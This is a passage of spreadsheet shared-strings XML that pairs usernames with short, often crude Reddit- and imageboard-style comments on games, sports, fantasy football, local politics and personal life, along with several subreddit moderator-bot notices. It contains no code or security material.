  </si>
  <si>
    <t>This method of reading and writing poems has been passed down the Armstrong bloodline for generations</t>
  </si>
  <si>
    <t>OhNoThatSucks</t>
  </si>
  <si>
    <t>Show me ONE guy who asked to change the armor of every cruiser in the game. I can wait.</t>
  </si>
  <si>
    <t>NCatP_returns</t>
  </si>
  <si>
    <t>Ah, I had similar happen to me with 10 k giving 1 or 2 k</t>
  </si>
  <si>
    <t>Trevor775</t>
  </si>
  <si>
    <t>Greenbelt Looks nice. But who would be able to move in then. The Wikipedia article stated a stringent screening process. Also, who pays for it? Is the money to build it taken from schools, roads,..., or a tax increase? I personally feel that government spending should be directed to projects that benefit all rather than for personal use by a few. High density housing is more economical and can be just as nice as single family homes. A real downtown in Reno or sparks with walking streets would be more affordable and be fun.</t>
  </si>
  <si>
    <t>Bouchardtb</t>
  </si>
  <si>
    <t>Ranking these four... 1. Futaba (Tomb) 2. Kamoshida (Castle) 3. Kaneshiro (Bank) 4. Madarame (Museum)</t>
  </si>
  <si>
    <t>cookingstuffyt01084</t>
  </si>
  <si>
    <t>Congrats! If you want you can check out my channel as well as help support each other! [https://www.youtube.com/watch?v=JkgZWj12tS0&amp;](https://www.youtube.com/watch?v=JkgZWj12tS0&amp;)</t>
  </si>
  <si>
    <t>Misophoniasucksdude</t>
  </si>
  <si>
    <t>I took a picture of the number, that's about it lol. I'm a huge person for always trying to do better- run longer, look better, etc. I dont think my journey has an end, so milestones aren't really super exciting.</t>
  </si>
  <si>
    <t>&gt;&gt;3468282 &gt;&gt;3468360 &gt;10 pictures and 4 are practically the same &gt;and one is the same as the other 4 just at a higher angle</t>
  </si>
  <si>
    <t>Redditslc</t>
  </si>
  <si>
    <t>Cut someone alright!</t>
  </si>
  <si>
    <t>Circus_Bettor</t>
  </si>
  <si>
    <t>Yes, today we are all supposed to go on strike, even students MUST WALK OUT of their classrooms! This is what a Swedish pre-teen with Asperger's syndrome has told us to do. If you do NOT DO THIS, then you are an "ignorant CLIMATE DENIAR" and deserve rebuke and mockery. HOW DARE YOU! Please see the above video to be properly informed. It is HIDDEN DEEPLY within the google algorithms DELIBERATELY because it SPEAKS THE TRUTH TO POWER!!! Watch it if you dare, but beware, you will be in opposition to the ELITES who want MONEY and POWER for bureaucracies and stealth investing. You will feel like you are swimming against the current. And it will feel unnatural to oppose the rest.</t>
  </si>
  <si>
    <t>Why does anyone's are about garuga weapons? Poison isn't going to be worth much by the time your set starts coming together.</t>
  </si>
  <si>
    <t>PizzaMaurizio</t>
  </si>
  <si>
    <t>Belinda in true Swiss fashion, choking away the 1st set</t>
  </si>
  <si>
    <t>BLACKFINTURKEY</t>
  </si>
  <si>
    <t>Quote: : Yes the wait sucks. Are you doing individual or trust? Wait times on individuals have been coming down from what I've read. Trust I hear wait times are 11months!</t>
  </si>
  <si>
    <t>Augenmann</t>
  </si>
  <si>
    <t>That's a Boss from Final Fantasy. I think you mean Zoroark.</t>
  </si>
  <si>
    <t>eduardkoopman</t>
  </si>
  <si>
    <t>(see my answer above to user TheLastMgtow, maybe you could reply or add info on the posted questions).</t>
  </si>
  <si>
    <t>Eat my dongus you fuckin nerd. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/wallstreetbets) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>MisterTwister22</t>
  </si>
  <si>
    <t>https://youtu.be/ZZZ7k8cMA-4</t>
  </si>
  <si>
    <t>ZakuIsAMansName</t>
  </si>
  <si>
    <t>.... I mean I was just having fun... my first response was equally over the top in the opposite direction in case you didn't notice.... no I don't actually think life is beautiful because of a joke about the kardashians and star trek.... maybe don't take every comment so seriously?</t>
  </si>
  <si>
    <t>benkenobi5</t>
  </si>
  <si>
    <t>Sob I'm guessing younger child sees the things older child gets away with, and dials it up to 11? Sounds about right from my experience</t>
  </si>
  <si>
    <t>Echo09Black</t>
  </si>
  <si>
    <t>So the best solution is to convert loose files in a single or a few .ba2 archives? But then I will have to make new esps with new pathing? Also, I have very few loose files, most mods I installed that are texture mods (or do anything more than simple mesh edits) come in .ba2 archives in Fallout4/Data</t>
  </si>
  <si>
    <t>spacedust94</t>
  </si>
  <si>
    <t>12 tackles is the average for an NFL linebacker, glad to know you watched your first game yesterday.</t>
  </si>
  <si>
    <t>SteeMonkey</t>
  </si>
  <si>
    <t>There's a playlist everyone can add songs to.</t>
  </si>
  <si>
    <t>Aaryra</t>
  </si>
  <si>
    <t>Oh sh*t it means you’re irrelevant</t>
  </si>
  <si>
    <t>Crowbarmagic</t>
  </si>
  <si>
    <t>With the state of the news outlets today, I sometimes feel like all I can trust is Reuters. CNN, FOX... It's a shitshow. Thank you for the link, but I'm not sure I will visit that sub. I understand there are plenty of situations in which a responsible gun owner saved the day. I'm just not convinced it outweighs all the criminals and lunatics with guns. Agree to disagree.</t>
  </si>
  <si>
    <t>araujoms</t>
  </si>
  <si>
    <t>&gt; Coasting is more efficient than regen. Well yes, but no. If you just coast until stop it is more efficient than using regen to stop, but that's hypermiling. When driving normally you'd coast an then brake, which is less efficient than letting regen smoothly brake the car.</t>
  </si>
  <si>
    <t>Andyham</t>
  </si>
  <si>
    <t>Went TAA over Robertson at the start of last season. Big regrets was had</t>
  </si>
  <si>
    <t>&gt;&gt;477855230 If you didn't even hear about KoF then you are not very versed in the gaming media.</t>
  </si>
  <si>
    <t>jokeland</t>
  </si>
  <si>
    <t>Willowglen said: ↑ One of the things discovered in the lawsuit was Howard made Sirius pay Buchwalds 10 percent so it didn't affect his 100 million. Then once he figured out that the less the show cost to produce the more he got to keep was when the cuts started coming. First with the 101 roster and then with his own show. All of these salaries were sacrificed on the Wiggy Marble pile altar Click to expand... somehow Shuli is still getting paid</t>
  </si>
  <si>
    <t>&gt;&gt;22137476 That's one heck of a gritty life you live. If you're in constant pain, it's only natural to not be in high spirits all time, but I think I get that for you, it's just how life is. Life still need to go on, only you get to play it on hard mode. Mima will definitely show up again one of these days.</t>
  </si>
  <si>
    <t>YeeyeePDF</t>
  </si>
  <si>
    <t>Okay but remember ***that*** Wii Remix with the best? That shit fucking slaps so hard</t>
  </si>
  <si>
    <t>Green Slime King</t>
  </si>
  <si>
    <t>I just don’t understand it. Over 2 years and nothing but overpriced ports. The audacity to sell DMCs trilogy separately being for me the final straw. It just makes no sense. Meanwhile we have fucking Bethesda of all companies publishing Doom Eternal day and date!</t>
  </si>
  <si>
    <t>Arif2803</t>
  </si>
  <si>
    <t>(Original post by kipper44) I had my first 'update' email, basically just saying the next meeting will be 17 September so successful applicants will hear start of Oct. Not that helpful really!! I havent had an update email today? Not sure what order this is being done in or maybe they email separate locations separately?</t>
  </si>
  <si>
    <t>RADEON360</t>
  </si>
  <si>
    <t>Honestly it seems like some people had to have taken some character preset at birth and just made a few changes. I've seen so many people having these similar faces. I can't be sure if it's just my lack of ability to discern faces properly though.</t>
  </si>
  <si>
    <t>blinzz</t>
  </si>
  <si>
    <t>not sure I get this one</t>
  </si>
  <si>
    <t>mbr3nq3</t>
  </si>
  <si>
    <t>Not too sure Digne is worth keeping. Everton are shit. Again</t>
  </si>
  <si>
    <t>IceLacrima</t>
  </si>
  <si>
    <t>I think the closest you can get to the experience you would have with the old touch controllers is to use the Mamut VR grips, they make the whole controller way more comfortable.</t>
  </si>
  <si>
    <t>pookachu123</t>
  </si>
  <si>
    <t>Exactly, so imo its just best to not comment one way or another. "I don't know and I need more info" is the appropriate answer imo.</t>
  </si>
  <si>
    <t>RyDavie15</t>
  </si>
  <si>
    <t>I feel like small penis jokes aren’t really all to harmful because 99.9% of small penis jokes the person has never even seen your cock and they got no clue of its actual size.</t>
  </si>
  <si>
    <t>DictatorInPerpetuity</t>
  </si>
  <si>
    <t>Now these are the posts I subscribed for. Nice find OP!</t>
  </si>
  <si>
    <t>16mhz</t>
  </si>
  <si>
    <t>He must be upset you mistreat hom</t>
  </si>
  <si>
    <t>Additional_Example</t>
  </si>
  <si>
    <t>&gt; It gets overlooked because it lacks the character and unique downtown sectors of its neighbors like Berkley and Ferndale this is true, but mostly it's overlooked because it's majority Black</t>
  </si>
  <si>
    <t>kellimay15</t>
  </si>
  <si>
    <t>I am so sorry to hear about your dog! 😢 That is very sad!</t>
  </si>
  <si>
    <t>&gt;&gt;90177073 I like Yousician, it's $10 a month and their music is terrible, but you'll stick to a routine and become great, just need a microphone or audio input for your autistic guitar, that's it.</t>
  </si>
  <si>
    <t>JayMuva</t>
  </si>
  <si>
    <t>I had my baby yesterday at 37 weeks 2 days weighed 6pds and 7ounces via emergency csection</t>
  </si>
  <si>
    <t>Inevitable_destiny</t>
  </si>
  <si>
    <t>Holy s**t, the amount of people that doesnt know what the UEFA club coefficients list is, or bother to read the comment explaining it. . Now all the short sighted overreacting makes alot more sense.</t>
  </si>
  <si>
    <t>&gt;&gt;3465643 An Inkling celebrating their victory but gets their pants pulled down by another Inkling (or the enemy Inkling) revealing a wet diaper with squid patterns fading away</t>
  </si>
  <si>
    <t>BSACCOUNT111</t>
  </si>
  <si>
    <t>One word: airflow. If you can add case fans, do so. If not, open your side panel and use a box fan. Your pc will get dirtier, but it should definitely be cooler with more airflow.</t>
  </si>
  <si>
    <t>Branflakanator</t>
  </si>
  <si>
    <t>Story; Driving through a mall and I hear screaming and yelling. A bigger male is beating his girl in the parking lot and she goes to lock herself in her vehicle. He goes around and beats her from a now open passenger door. I yell and tell him to get away, he’s cursing me out. Eventually he gets the vehicle from her and tries to ram me and my girlfriend in our Mazda 3. I drive and he follows us at high speed throughout this mall parking lot. After a few crazy turns he rams my rear and pushes me up a curb and hitting a tree. I flag down a cop and he was nowhere to be found. Lucky to be alive.</t>
  </si>
  <si>
    <t>vandymontana</t>
  </si>
  <si>
    <t>I liked 2nd and 3rd down...</t>
  </si>
  <si>
    <t>atseasheiscalm</t>
  </si>
  <si>
    <t>I think so. You hear about celebrities enjoying Reddit because of the anonymity of it. So I would imagine people from all walks if life do as well.</t>
  </si>
  <si>
    <t>jaykaywhy</t>
  </si>
  <si>
    <t>I make a chocolate mousse to ward off cravings. Put heavy cream in a mixer until it gets thick and stands. Mix in unsweetened cocoa powder and your favorite artifical sweetener (I use monk fruit).</t>
  </si>
  <si>
    <t>Kendallsan</t>
  </si>
  <si>
    <t>One day about ten years ago on the way to the grocery store we saw an article in the paper that some foreign exchange students were coming to town for three weeks, but there were not enough host families. Long story but we signed up and got some friends to sign up as well. The kids were all French. We ended up with Emma, a 16 year old girl. We took her EVERYWHERE. Baseball games, county fair (including a demolition derby), Congress, all the major memorials in DC, New York City, Ocean City NJ (my husband is a private pilot so we flew her and one of the other girls up there and back for the day to visit my family and have a beach day), water park, painting ceramics, zoos, roller skating, mini golf, she got to "drive" my brother's semi truck, an amusement park - everything we could think of and anything she asked for. It was three weeks of crazy fun. We also took her shooting, which is a whole other story, but she loved it - took lots of Charlie's Angels type pictures. She turned out to be just the sweetest, most wonderful person, and we cried when we had to let her go home. We completely fell in love with her, and have basically adopted her as our own daughter. We visited her in France a few years after her first visit to us, and the entire community accepted us as her second parents. Spectacular time, and we love her mom. Since then, she stayed with us one summer for an internship in college, and has visited us several times since then, once with her mom and a cousin who we also adored. She and her mom came with us this year to our birthday celebration in Mexico. She has recently graduated from university and has a really good job. We could not be more proud of her. She calls us her American parents. She is the daughter of our hearts, and we will always love her. It was a very weird thing that we initially chose to do this, not out of character exactly but not something we normally do. So it must have just been that we needed each other in our lives. I'm not a believer in the "everything happens for a reason" mantra, but in this case I am really happy that the weird events leading to us meeting Emma happened. She really brightens our lives, and we love her so much.</t>
  </si>
  <si>
    <t>karalanda</t>
  </si>
  <si>
    <t>Would you say male nipples do not play an important part during sexual activity? I've always wondered about that whenever this argument comes up. And to me (bisexual as well) a nice looking male upper body can be very sexual (I think most people into men would agree). But if I see a highly attractive guy on the beach I will try to be sensible about it instead of starring at him while drooling. Women have sexual thoughts too obviosly. "Also creating a problem of people showing things they don't actually want to show to everyone in the public." If I run around in short pants I want to show my body to the public in short pants. I just don't want to be starred and yelled at by a stranger with a boner for it. Wearing stuff is my thing, acting like a dick towards me is the strangers thing. If anything, he needs to fix his behaviour, not I mine. "But that didn't "fix" any sexualization problem" About that: Would you say you get aroused by seeing ankles in your everyday live? Because as OP said, that was an actual debate. And again, my point of me seeing a guys upper body on the beach. It's definitely not an asexual thing, but I can talk to him normally and treat him being topless normally. Because it is. I'd want the same for me.</t>
  </si>
  <si>
    <t>Waterbears</t>
  </si>
  <si>
    <t>We're having BBQ ribs and cornbread. We were supposed to have zucchini with it but I ate it all before anyone else could get any. At least my food urges are healthy so far??</t>
  </si>
  <si>
    <t>--Orchid--</t>
  </si>
  <si>
    <t>This episode seemed kind of off to me. Not bad it just caught my attention as strange, like it ended abruptly without a clear ending. I hope this doesn't mean its serialized. What does everyone else think? Will they go back to being serialized like the other recent seasons?</t>
  </si>
  <si>
    <t>&gt;&gt;52563466 I'd get arrested for muh animal abuse in my country for that. You probably would too.</t>
  </si>
  <si>
    <t>amaikaizoku</t>
  </si>
  <si>
    <t>What ballads are popular lately? What are the big songs of 2019? I need some more Korean ballads in my playlist</t>
  </si>
  <si>
    <t>ShaquilleOhNoUDidnt</t>
  </si>
  <si>
    <t>why the US? we don't throw away that much into our waterways like china and some african countries. china is responsible for most of the plastic and it's coming from stuff they consumed not made. as in from citizens throwing their own trash into rivers and not factories. just as an inb4</t>
  </si>
  <si>
    <t>&gt;&gt;22111882 HE ERIKANTRICE THEORY &gt;what is? it's a theory that explaine all games with kanon and george as culprits(kanon is yasu but not shannon and a women!!!) genji(for loyalty), kumaswa and nanjo(for 4th game bank money) accomplices with this all the games have the same culprits(in the 5th kanon is only an accomplices and the 6th game is a battler's game soo doesent matter) &gt;so how you explaned when battler say that even if erika join them there are 17 humans? If she really increase the number of the humans to 17 this mean that she exist but after battler say this she disappier!!! this mean erika doesent count as a human So erika is like kanon a mental illness of one of 17 person!!! &gt;who is this human? and how can you explaine the end of the 6th game how can kanon save battler if she isnt shannon? so how can you explaine why erika didnt see kanon when she open the wardrobe? simple because kanon hide into herself KANON=ERIKA erika become kanon, made battler exit and return erika this is why she didnt see kanon!!! thid explaine everything so i called this theory ERIKANTRICE THIS IS THE TRUE SOLUTION OF UMINEKO!!!!</t>
  </si>
  <si>
    <t>gleba</t>
  </si>
  <si>
    <t>Sadly, that was all they said, it didn't specify if they were talking about single doses or prescriptions. The whole article was very non-specific and didn't cite a source.</t>
  </si>
  <si>
    <t>CianKiw1</t>
  </si>
  <si>
    <t>Oof. Free +5 shards though</t>
  </si>
  <si>
    <t>faitheamber</t>
  </si>
  <si>
    <t>It’s really hard to say because spotting and light bleeding can be perfectly normal. But can also be the start of a MC. So just stay positive and not stress until you know either way. I had no pain with my Mc. They told me as long as you’re not filling a pad you’re fine.</t>
  </si>
  <si>
    <t>Put me in coach I'll fix the meta!</t>
  </si>
  <si>
    <t>AlvinIsBusy</t>
  </si>
  <si>
    <t>Full 1 ppr my current rb: Lindsay, Montgomery, Gore, Penny current wr: D. Adams, B. Cooks, Edelman, Mclaurin should I try traded for a better rb like mack?</t>
  </si>
  <si>
    <t>###This is a reminder to [read the rules before posting in this subreddit](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion). 1. **Headline titles should be changed only [when the original headline is unclear](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_1._headline_titles_should_be_changed_only_where_it_improves_clarity.)** 2. **Be [respectful](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_2._be_respectful).** 3. **Keep submissions and comments [substantive](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_3._keep_submissions_and_comments_substantive).** 4. **Avoid [direct advocacy](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_4._avoid_direct_advocacy).** 5. **Link submissions must be [about Canadian politics and recent](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_5._link_submissions_must_be_canadian_and_recent).** 6. **Post [only one news article per story](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_6._post_only_one_news_article_per_story).** ([with one exception](https://www.reddit.com/r/CanadaPolitics/comments/3wkd0n/rule_reminder_and_experimental_changes/)) 7. **Replies to removed comments or removal notices will be removed** without notice, at the discretion of the moderators. 8. **Downvoting posts or comments**, along with urging others to downvote, **[is not allowed](https://www.reddit.com/r/CanadaPolitics/wiki/downvotes)** in this subreddit. Bans will be given on the first offence. 9. **[Do not copy &amp; paste the entire content of articles in comments](https://www.reddit.com/r/CanadaPolitics/wiki/rules-thelongversion#wiki_9._do_not_copy_.26amp.3B_paste_entire_articles_in_the_comments.)**. If you want to read the contents of a paywalled article, please consider supporting the media outlet. *Please [message the moderators](https://www.reddit.com/message/compose?to=%2Fr%2FCanadaPolitics) if you wish to discuss a removal.* **Do not reply to the removal notice in-thread**, *you will not receive a response and your comment will be removed. Thanks.* *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/CanadaPolitics) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Elf_Lord_Elphias</t>
  </si>
  <si>
    <t>when you're on stage and you forget your line</t>
  </si>
  <si>
    <t>shrimpy-boyo</t>
  </si>
  <si>
    <t>r/dontputypurdickinthat</t>
  </si>
  <si>
    <t>h3lme7</t>
  </si>
  <si>
    <t>Looks like he's in the middle of a deep sigh, contemplating what the fuck he's doing hanging with that shitty band.</t>
  </si>
  <si>
    <t>Link_O_las</t>
  </si>
  <si>
    <t>A game with a movie series</t>
  </si>
  <si>
    <t>Colour_out_of_Space</t>
  </si>
  <si>
    <t>padraig : This seems like a great movie, but I can't stand movies that are just a parade of humiliation and misery. But enough about my wedding video. HEYOOOO!</t>
  </si>
  <si>
    <t>_ice_man_</t>
  </si>
  <si>
    <t>I’m looking at Foles vs. Cowboys. 2017 shouldn’t count.</t>
  </si>
  <si>
    <t>patrioticprolapser</t>
  </si>
  <si>
    <t>Idk think you're just looking at Sean Payton and his anus mouth again.</t>
  </si>
  <si>
    <t>Back to /a/ incel.</t>
  </si>
  <si>
    <t>Duke-Silv3r</t>
  </si>
  <si>
    <t>You’re a nasty mofo lmao</t>
  </si>
  <si>
    <t>SEND_ME_UR_SEXY_PICS</t>
  </si>
  <si>
    <t>Cause at the end of the day, long as there's two people left on the planet...</t>
  </si>
  <si>
    <t>CountVonBenning</t>
  </si>
  <si>
    <t>Fuck Utica fans, sorry, but who gives a shit? Move the team to Abbotsford or Victoria and get on with it.</t>
  </si>
  <si>
    <t>Energylegs23</t>
  </si>
  <si>
    <t>To escape the yard</t>
  </si>
  <si>
    <t>MadBede</t>
  </si>
  <si>
    <t>Originally Posted by Uhnomuhlee Go to original post I agree. They lowered it because a certain youtuber said it should be lower to "force people to make choices" which was ridiculous. I mean, you're fighting another agent, not some Hyena foot soldier. It should be an epic battle. You dying so fast you wont be able to react at all, like insta kill, cmon Massive...</t>
  </si>
  <si>
    <t>sauceydawsey</t>
  </si>
  <si>
    <t>10 teams. PPR. Keeper league. QB- Rodgers RBs - Fournette, Mixon, White, Gordon, Damien Williams WRs - Adams, Ridley, Golladay, Godwin, Tate, Dorsett, Hardman Receive - Robert Woods Trade - D. Williams and Hardman I’m trying to make a reasonable 2-for-1 as Josh Allen is available and I want to snag him to alternate between him and Rodgers throughout the season.</t>
  </si>
  <si>
    <t>Egsession</t>
  </si>
  <si>
    <t>Serious question: are you 12 years old? Because you are acting way younger than 12.</t>
  </si>
  <si>
    <t>The final boss of the second wing is so fucking unfun bros Don't waste your gold like an idiot like me He even stole my healing minions like Rag Lightlord and I fucking went backwards in progression</t>
  </si>
  <si>
    <t>CTJ2013</t>
  </si>
  <si>
    <t>Location: Atlanta, GA Posts: 98 I've bought one of AmmoGarands 'semi-repro' short pinions and a repro flush nut to stand in until I was able to find originals. I'm going to hang onto it for a future stand-in job, but you can always buy just those two parts and then source the additional parts elsewhere. Finding GI parts for the rest of the rear sight assembly isn't too hard - a checkered elevation cap will set you back at least $100 or so. As for sight seals, the only ones I ever see come up are those NIW ones like you saw on ebay, usually right around $100. Best of luck! Skretchy</t>
  </si>
  <si>
    <t>PlanksterMcGee</t>
  </si>
  <si>
    <t>EST, but I’m about to be free a lot, as I’m switching my full time job for part time.</t>
  </si>
  <si>
    <t>ZuluQc</t>
  </si>
  <si>
    <t>I start a print in the morning bf going to work or at night bf bed... it crash, clogg or bug 10 min after im gone. I return/wake up solve the problem resume or restart, im at home and have a eye on it for 5,6,7 hours.. nothing. Works perfectly and finish the print. This happen 4 times. Last night, all go well. I go to bed.. woke up 7am, clog about 20 min aftet i left it bf bed. At lunch, came home bug again. Resume it.. ok for afternoon, all night np.. go figure.</t>
  </si>
  <si>
    <t>SirBabyT</t>
  </si>
  <si>
    <t>Have had this font in my head for a while but don’t remember where I saw it! It’s blocky with very fine lines filling in the thicker part of the letter. Hope my crappy sketch helps! Thanks![Art Deco ](https://imgur.com/gallery/EZ8r7SZ)</t>
  </si>
  <si>
    <t>awf1992</t>
  </si>
  <si>
    <t>I have tried that to a certain extent but on a limited budget as I tend to buy watches on the basis of what I am interested in learning to service at the time. Hence the abundance of seiko movements. I am feeling like learning a bit more about chronograph movements, any recommendations on watches that are reasonably priced with a good movement to work on?</t>
  </si>
  <si>
    <t>KeepingDankMemesDank</t>
  </si>
  <si>
    <t>If this is a dank meme, **Upvote** this comment! If this is not a dank meme, **Downvote** this comment! If this post breaks the rules, **report** it and **Downvote** this comment! ^Thank ^you ^for ^helping ^us ^in ^keeping ^/r/dankmemes ^dank. [^Hit ^us ^up](https://www.reddit.com/message/compose?to=/r/dankmemes) ^if ^you ^have ^any ^questions. ^( ^I'm ^a ^bot)</t>
  </si>
  <si>
    <t>Jgentleman</t>
  </si>
  <si>
    <t>That’s not what I asked though. Anyway, thanks for the advice.</t>
  </si>
  <si>
    <t>vegard_bakke</t>
  </si>
  <si>
    <t>Hi Roisolberg, Could you please post your Resource filer, Actions and full Conditions for you custom stream rule? I'm trying to add the same condition to remove the sheet, but then my stream does not appear. So something is different, and I'd like to find out what. 🙂</t>
  </si>
  <si>
    <t>martini2222</t>
  </si>
  <si>
    <t>At this point, i feel like there really is no situation where brig is better than lucio. They’re both off healers, both are supposed to be good at duelling but because brig’s shield dies immediately and her self healing is worthless she feels like she loses every encounter. She sort of got a little bit of zen’s role with her multiple health packs, but they’re not really good enough to choose her for that alone. They never really improved her base healing, which means now she basically has no niche given that her aoe isn’t as consistently up like lucio’s is (and it’s heal rate isn’t enough to compensate) and her throw out healing is just not enough to replace zen With doom being meta, zen just gets targeted immediately, making it so i can never pick him safely. Brig is trash for alp the above reasons. Mercy is a good off healer pick, but, as soon as i do, everyone dps wants me to pocket them + she’s really not that fun to play. So 9/10 if my other healer picks a main heal it’s lucio for me. Lucio isn’t even that good either. His healing and speed boost are both completely worthless when amp it up is on cooldown. Lucio is fun, but I really miss being able to have other options. Am i the only one who thinks this?</t>
  </si>
  <si>
    <t>Chewblacka</t>
  </si>
  <si>
    <t>What was the extended warranty? Like $2k?</t>
  </si>
  <si>
    <t>DarkTrance</t>
  </si>
  <si>
    <t>BigNumber12 : Rik01: Sound familiar? The US did it with Hoover Dam. The Movie 'Deliverance' was based on it. The Chinese did it with the 7 gorges dam and wiped out not only villages but a bunch of historic ruins. So, now this on comes along and it's no surprise that the local government is ignoring the needs of the mainly poorer people who live there. There's several dams around the globe which hides entire villages in their depths. Which towns and ruins were destroyed by the creation of the Hoover Dam? Be specific. There was a town that was submerged due to the Hoover Dam project, St. Thomas. Although now since the lake level is so low, you can go to the previously-submerged town and visit the ruins. It's now a National Park Service historic site.</t>
  </si>
  <si>
    <t>StabbyMcStabbyFace</t>
  </si>
  <si>
    <t>The amazingly affirming flipside to this was when my son fell and hit his head, took him to the ER, and the doctor ordered a CT scan to make sure he didn't have a mild case of serious brain damage (nah, he's fine no worries). Kiddo wanted me in there with him, asked the radiologist if I could. No problem. We get in there, they're putting him on the table, they're bringing me a lead apron and they asked if I could possibly be pregnant. I wish, but that's currently impossible. Holy crap it felt good to pass well enough to a medical professional that they had to ask.</t>
  </si>
  <si>
    <t>#### Hey there enlguy, your post has been automatically filtered for further review for the mod team. It does not mean your post has been removed! &gt; Rule 2\. "We welcome **discussion-promoting** posts that benefit the community (device reviews, guides, discussions and rumors) and not the individual (support questions, rants, customer service complaints, selling/trading devices, etc)." &gt; [See the wiki page for more &gt; information.](http://www.reddit.com/r/Android/wiki/rulesandregs#wiki_2._we_welcome_discussion-promoting_posts_that_benefit_the_community.2C_and_not_the_individual.) You may be interested in: - /r/AndroidQuestions - General queries. - [Your device's respective subreddit](http://www.reddit.com/r/Android/wiki/subreddits) or [xda-developers.com](http://forum.xda-developers.com/compact) - Device-specific queries. - /r/PickAnAndroidForMe - Device recommendations. - /r/AndroidApps - App recommendations. - /r/AndroidThemes - Customizing your device. - [The AOSP tracker](https://code.google.com/p/android/) - Reporting Android bugs/feature requests. - [eBay](http://www.ebay.com/), [Swappa](http://www.swappa.com/), [craigslist](http://www.craigslist.com/), or /r/hardwareswap - Selling, buying or trading devices. - Additionally, you might be interested in viewing our [IRC, Discord, or Telegram chat servers](https://www.reddit.com/r/Android/wiki/index#wiki_.2Fr.2Fandroid_chat_rooms). Feel free to message the moderators [here](https://www.reddit.com/message/compose?to=%2Fr%2Fandroid) if you want further information. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Android) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Sarah_Anne13</t>
  </si>
  <si>
    <t>I'M NOT CRYING, YOU ARE</t>
  </si>
  <si>
    <t>feeCboy</t>
  </si>
  <si>
    <t>I want your brembos</t>
  </si>
  <si>
    <t>somewiseguy77</t>
  </si>
  <si>
    <t>Sent a message to the skies, wounded soldiers left to die</t>
  </si>
  <si>
    <t>Loganp812</t>
  </si>
  <si>
    <t>*Willem Dafoe's disembodied voice* - "In spite of everything you've done for them, eventually they will hate you."</t>
  </si>
  <si>
    <t>cluelessmans75</t>
  </si>
  <si>
    <t>I heard you shouldnt use kali on a VM and you need to only use it for a read only usb drive</t>
  </si>
  <si>
    <t>AKiss20</t>
  </si>
  <si>
    <t>Do you know how they do that? Is there some detent they engage that locks the rotor to the right place as it spins down while vertical or something?</t>
  </si>
  <si>
    <t>Razsum</t>
  </si>
  <si>
    <t>Verify if you're going to claim to be a leo.</t>
  </si>
  <si>
    <t>Supreme_Logic_420</t>
  </si>
  <si>
    <t>Exactly.</t>
  </si>
  <si>
    <t>PacketPilgrim</t>
  </si>
  <si>
    <t>I always knew, from the first time I seriously considered the question. I just never had any interest in reproducing. There was no little voice in my head, just a sense of relief that it was no longer an issue. When you consider how much of a fight it's been for so many of us to make it happen, it's definitely not a conveyor belt through a tunnel, or stepping onto a greased slope. It sounds like you need some reassurance, though, and nothing puts your mind at ease quite like having the facts. So ask in that first session about any penalties for bailing out, up to and including a no-show at the operating theatre. Then you'll know, and you'll be less afraid.</t>
  </si>
  <si>
    <t>inwood</t>
  </si>
  <si>
    <t>How do you control arthritis? Are you physically able to look after a baby?</t>
  </si>
  <si>
    <t>epicmemedealerj</t>
  </si>
  <si>
    <t>how to epicly fool the area 51 guards</t>
  </si>
  <si>
    <t>SmallTownMortician</t>
  </si>
  <si>
    <t>Please don’t blame my folks. I was very good at appearances and also very good at sneaking out of the house.</t>
  </si>
  <si>
    <t>**PLEASE READ THIS MESSAGE IN ITS ENTIRETY BEFORE TAKING ACTION.** Your post has been removed as it violated [Rule 2](http://www.reddit.com/r/AskReddit/wiki/index#wiki_-rule_2-). Please check that your post doesn't contain the following issues: * **Your post can't be specific to your situation or involve a story. Please make sure to depersonalize your question (such as removing personal pronouns) and remove any unnecessary context before posting it again.** **Please use one of these subreddits:** * Need advice? /r/advice or /r/needadvice or /r/relationship_advice * Can't remember something? /r/TipOfMyTongue * Looking for a particular subreddit? /r/findareddit. Please note - once posted, the titles cannot be edited. If your title breaks the rules, please feel free to [make a new post](/r/askreddit/submit?selftext=true) that fits within the rules. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AskReddit) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>mar1us1602</t>
  </si>
  <si>
    <t>Same here. But i tried going for adc at first, then support and i finally landed mid where i spam syndra for ranged matchups and my girl Riven for all melee</t>
  </si>
  <si>
    <t>RufusEnglish</t>
  </si>
  <si>
    <t>I saw a news report last year saying the decline was due to counterfit tobacco from abroad. Nope it's vapes. All the smokers I know are now capers, not a counterfit cigarette in sight.</t>
  </si>
  <si>
    <t>TRISH</t>
  </si>
  <si>
    <t>MN TRITON DUEL CAB ARB TOWBAR HAS RECOVERY POINTS SIDE PROTECTION RATED TO 3000KG 300KG BALL WEIGHT THESE ARE THE BEST BARS ON THE MARKET COMPLETE WITH MOUNTING HARDWARE</t>
  </si>
  <si>
    <t>gibbee530</t>
  </si>
  <si>
    <t>NAH If your girlfriend has any doubts just block and delete the other girls number. Make good and sure you let your girlfriend see you do it.</t>
  </si>
  <si>
    <t>Silver_Rose</t>
  </si>
  <si>
    <t>Yeah it shouldn’t be about girls being better or boys being better, it’s down to each individual person about who you are and gender doesn’t decide that.</t>
  </si>
  <si>
    <t>DramanthonyRigatoni</t>
  </si>
  <si>
    <t>German steamer</t>
  </si>
  <si>
    <t>GeliebteShominy</t>
  </si>
  <si>
    <t>&gt; Youre clearly not at all a fight fan if you think it was fixed. Wow... /r/gatekeeping much I watched it a few days later cuz I was bored and I thought KSI won. Other than that we get dozens of very "dodgy" boxing decisions every year and thinking that a match between "celebs" is fixed is not such a crazy thought.</t>
  </si>
  <si>
    <t>grindingears911</t>
  </si>
  <si>
